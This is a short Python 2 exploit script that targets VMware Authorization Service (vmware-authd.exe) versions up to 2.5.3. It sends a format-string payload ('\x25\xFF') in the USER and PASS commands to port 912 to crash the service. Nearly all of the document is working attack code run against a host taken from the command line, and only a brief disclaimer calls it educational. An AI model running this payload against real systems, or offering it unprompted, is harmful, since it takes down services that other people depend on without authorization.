# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------

# usage: C:\>exploit.py 127.0.0.1 912

import socket
import time
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d

    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d

    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."